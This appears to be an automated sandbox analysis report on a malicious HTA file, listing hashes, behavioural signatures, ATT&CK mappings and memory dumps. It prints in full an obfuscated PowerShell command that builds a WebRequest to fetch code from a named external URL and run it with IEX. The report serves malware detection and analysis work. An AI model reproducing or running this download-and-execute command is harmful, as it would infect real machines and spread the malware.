41a306a197179294435fa744d946f94cea575a2bb2a415a2efa5f564c9017149

General

Target

enc3.hta
Size

4KB
MD5

586ddb57373ee157da834b1c83da00af
SHA1

d240d7266f86bc74817fc45556d0d4cae4424efc
SHA256

06769b16f5a4d86ab1c87f7811b6ed4964814cb469e01321c888dab9a2bf5696
SHA512

467b362ba0feed6b6a15ce2ff767bf2e2503640f05369beba98b6dd67709a632f23b0186f7c21ecd330fd4911c19a68a6fe8e51649a7a983426fd1f2222a6b0e

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

POWERSHELL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1200	1884	POWERSHELL.exe

Drops file in System32 directory 1 IoCs

Processes:

POWERSHELL.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	POWERSHELL.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4084403625-2215941253-1760665084-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

POWERSHELL.exe

pid process

1200 POWERSHELL.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

POWERSHELL.exe

description pid process

Token: SeDebugPrivilege 1200 POWERSHELL.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4084403625-2215941253-1760665084-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1200	POWERSHELL.exe

description	pid	process
Token: SeDebugPrivilege	1200	POWERSHELL.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\enc3.hta"
1⤵
- Modifies Internet Explorer settings
PID:752

C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL $HAAEOALBRXAIOCSRBGSCEDW = '[\<5<_!]70#&-5)7@5(59]4y\<5<_!]70#&-5)7@5(59]4t(_*)})-[*\[/(%/0^!%{(@<{3%\$}7!6&14]}&1*=57[.IO.\<5<_!]70#&-5)7@5(59]4t_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}<{3%\$}7!6&14]}&1*=57[_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}d(_*)})-[*\[/(%/0^!%{(@_13[9$#[<1/}#^#2^8$$[)]'.Replace('\<5<_!]70#&-5)7@5(59]4','S').Replace('(_*)})-[*\[/(%/0^!%{(@','E').Replace('_13[9$#[<1/}#^#2^8$$[)','R').Replace(']61=$}4}}4^7<*&/@!%+\}','A').Replace('<{3%\$}7!6&14]}&1*=57[','M');$HLTYLQWQUSUZZXXCFYGBYAD = ($HAAEOALBRXAIOCSRBGSCEDW -Join '')|&('I'+'EX');$HZJDPHHLCFDWDOVEILVRHQQ = '[07^[^&[4<5=268_/]+1(-!y07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<_/$_4}0]/-)5%[/3\9@[email protected]_/$_4}0]/-)5%[/3\9@76@02=(]2+25)4/&*#[$2}36<.W_/$_4}0]/-)5%[/3\9@76@bR_/$_4}0]/-)5%[/3\9@76@qu_/$_4}0]/-)5%[/3\9@76@07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<]'.Replace('07^[^&[4<5=268_/]+1(-!','S').Replace('_/$_4}0]/-)5%[/3\9@76@','E').Replace('02=(]2+25)4/&*#[$2}36<','T');$HGWVOWBJIRKOZPAZDHKCXFR = ($HZJDPHHLCFDWDOVEILVRHQQ -Join '')|&('I'+'EX');$HATKNHVTWEYFZVGJTJKPOJF = '<&]4^<529_}0((#90_50&$r0*)$60%](_0*8%7$%{4&\_a[#}02[3_+}(*7!^3}[*#350*)$60%](_0*8%7$%{4&\_'.Replace('<&]4^<529_}0((#90_50&$','C').Replace('0*)$60%](_0*8%7$%{4&\_','E').Replace('[#}02[3_+}(*7!^3}[*#35','T');$HIGJPHAPDSYPKOSVELGREOR = '<2!\3]6!6<&_+7)[9)}\/^<+8]/@<9<^(+${/4-7%@)(tR<+8]/@<9<^(+${/4-7%@)(1*)9%/*/(56%3__7\}!\11pon1*)9%/*/(56%3__7\}!\11<+8]/@<9<^(+${/4-7%@)('.Replace('<2!\3]6!6<&_+7)[9)}\/^','G').Replace('<+8]/@<9<^(+${/4-7%@)(','E').Replace('1*)9%/*/(56%3__7\}!\11','S');$HRFXTROBLKIFECVKROLDLJL = 'G&/+0%*9_1+*1&)^)2$3<+(t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%pon21{}\5[($(]@_+8_\1+1\%&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(am'.Replace('21{}\5[($(]@_+8_\1+1\%','S').Replace('&/+0%*9_1+*1&)^)2$3<+(','E').Replace('(+<</9]!8<4(%}5)_9!{*7','R');$HPLYZILQXYLUTLCHOFQSIZE = '}_5)50/8//-/@10^)<{_$(\/5+^${{)\1@]!}04*@126a}&%406_!1]{7-7^%}&%50[To\/5+^${{)\1@]!}04*@126n}&%406_!1]{7-7^%}&%50['.Replace('}_5)50/8//-/@10^)<{_$(','R').Replace('\/5+^${{)\1@]!}04*@126','E').Replace('}&%406_!1]{7-7^%}&%50[','D');&('I'+'EX')($HLTYLQWQUSUZZXXCFYGBYAD::new($HGWVOWBJIRKOZPAZDHKCXFR::$HATKNHVTWEYFZVGJTJKPOJF('https://tradeguru.com.pk/Server3.txt').$HIGJPHAPDSYPKOSVELGREOR().$HRFXTROBLKIFECVKROLDLJL()).$HPLYZILQXYLUTLCHOFQSIZE())
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1200

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1200-54-0x000007FEFB541000-0x000007FEFB543000-memory.dmp

Filesize
8KB

Download
memory/1200-55-0x000007FEF3A50000-0x000007FEF4473000-memory.dmp

Filesize
10.1MB

Download
memory/1200-56-0x0000000002674000-0x0000000002677000-memory.dmp

Filesize
12KB

Download
memory/1200-57-0x000007FEF2EF0000-0x000007FEF3A4D000-memory.dmp

Filesize
11.4MB

Download
memory/1200-59-0x0000000002674000-0x0000000002677000-memory.dmp

Filesize
12KB

Download
memory/1200-58-0x000000000267B000-0x000000000269A000-memory.dmp

Filesize
124KB

Download
memory/1200-60-0x000000000267B000-0x000000000269A000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing